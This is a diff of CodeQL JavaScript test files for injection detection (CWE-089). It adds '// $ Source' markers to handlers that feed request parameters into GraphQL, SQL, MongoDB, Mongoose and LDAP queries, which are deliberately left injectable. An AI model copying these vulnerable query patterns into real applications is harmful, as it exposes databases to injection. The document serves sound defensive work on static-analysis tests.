@@ -35,7 +35,7 @@ app.get('/user/:id/', function(req, res) {
const { request } = require("@octokit/request");
app.get('/article/:id/', async function(req, res) {
const id = req.params.id;
const id = req.params.id; // $ Source
const result = await request("POST /graphql", {
headers: {
authorization: "token 0000000000000000000000000000000000000001",
@@ -51,7 +51,7 @@ import { Octokit as Core } from "@octokit/rest";
const kit2 = new Core();
app.get('/event/:id/', async function(req, res) {
const id = req.params.id;
const id = req.params.id; // $ Source
const result = await kit2.graphql(`foo ${id}`); // $ Alert
const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // $ Alert
@@ -70,7 +70,7 @@ var root = {
};
app.get('/thing/:id', async function(req, res) {
const id = req.query.id;
const id = req.query.id; // $ Source
const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // $ Alert
fetch("https://my-grpahql-server.com/graphql", {
@@ -114,6 +114,6 @@ const github = require('@actions/github');
app.get('/event/:id/', async function(req, res) {
const kit = github.getOctokit("foo")
const id = req.params.id;
const id = req.params.id; // $ Source
const result = await kit.graphql(`foo ${id}`); // $ Alert
});

2
javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js
View File

@@ -10,7 +10,7 @@ const connection = mysql.createConnection({
database: 'test'
});
app.use(route.get('/test1', (context, param1) => {
app.use(route.get('/test1', (context, param1) => { // $ Source
param1 = xss(param1)
connection.query(
`SELECT * FROM \`table\` WHERE \`name\` =` + param1, // $ Alert

4
javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js
View File

@@ -22,7 +22,7 @@ app.post('/documents/find', (req, res) => {
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');
const query = JSON.parse(req.query.data);
const query = JSON.parse(req.query.data); // $ Source
if (checkSchema(query)) {
doc.find(query);
}
@@ -47,7 +47,7 @@ app.post('/documents/insert', (req, res) => {
MongoClient.connect('mongodb://localhost:27017/test', async (err, db) => {
let doc = db.collection('doc');
const query = JSON.parse(req.query.data);
const query = JSON.parse(req.query.data); // $ Source
const validate = joiSchema.validate(query);
if (!validate.error) {
doc.find(query);

2
javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js
View File

@@ -2,7 +2,7 @@ const Router = require('koa-router')
const {Sequelize} = require("sequelize");
new Router().get("/hello", (ctx) => {
const { version } = ctx.query;
const { version } = ctx.query; // $ Source
if (version && validVersion(version) === false) {
throw new Error(`invalid version ${version}`);

2
javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js
View File

@@ -17,7 +17,7 @@ const sanitizeInput = function (input) {
};
const server = http.createServer((req, res) => {
let q = url.parse(req.url, true);
let q = url.parse(req.url, true); // $ Source
let username = q.query.username;

2
javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js
View File

@@ -8,7 +8,7 @@ app.use(bodyParser.urlencoded({ extended: true }));
app.post("/documents/find", (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
db.myDoc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value
});

2
javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js
View File

@@ -10,7 +10,7 @@ app.use(bodyParser.urlencoded({ extended: true }));
app.post("/documents/find", (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
doc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value
});

2
javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js
View File

@@ -12,7 +12,7 @@ app.use(bodyParser.urlencoded({ extended: true }));
app.post("/documents/find", (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
doc.find(query); // $ Alert - query is tainted by user-provided object value
});

12
javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js
View File

@@ -10,7 +10,7 @@ app.use(bodyParser.urlencoded({ extended: true }));
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');
@@ -22,7 +22,7 @@ app.post('/documents/find', (req, res) => {
// OK - throws unless user-data is a string
doc.find({ title: query.body.title.substr(1) });
let title = req.body.title;
let title = req.body.title; // $ Source
if (typeof title === "string") {
// OK - input checked to be a string
doc.find({ title: title });
@@ -44,7 +44,7 @@ app.get('/:id', (req, res) => {
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.query.title;
query.title = req.query.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');
@@ -54,7 +54,7 @@ app.post('/documents/find', (req, res) => {
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.query.title;
query.title = req.query.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, client) => {
let doc = client.db("MASTER").collection('doc');
@@ -63,7 +63,7 @@ app.post('/documents/find', (req, res) => {
});
app.post("/logs/count-by-tag", (req, res) => {
let tag = req.query.tag;
let tag = req.query.tag; // $ Source
MongoClient.connect(process.env.DB_URL, {}, (err, client) => {
client
@@ -98,7 +98,7 @@ app.post('/documents/find', (req, res) => {
});
function useQuery(queries) {
const query = {};
query.title = queries.title;
query.title = queries.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');

2
javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js
View File

@@ -21,7 +21,7 @@ app.post('/documents/find', (req, res) => {
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.query.title;
query.title = req.query.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');

4
javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js
View File

@@ -18,7 +18,7 @@ const Document = Mongoose.model('Document', {
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
Document.aggregate([query]); // $ Alert - query is tainted by user-provided object value
@@ -98,7 +98,7 @@ app.post('/documents/find', (req, res) => {
Document.findOneAndUpdate(X, query, function () { }); // $ Alert
let id = req.query.id, cond = req.query.cond;
let id = req.query.id, cond = req.query.cond; // $ Source
Document.deleteMany(cond); // $ Alert
Document.deleteOne(cond); // $ Alert
Document.geoSearch(cond); // $ Alert

Some files were not shown because too many files have changed in this diff Show More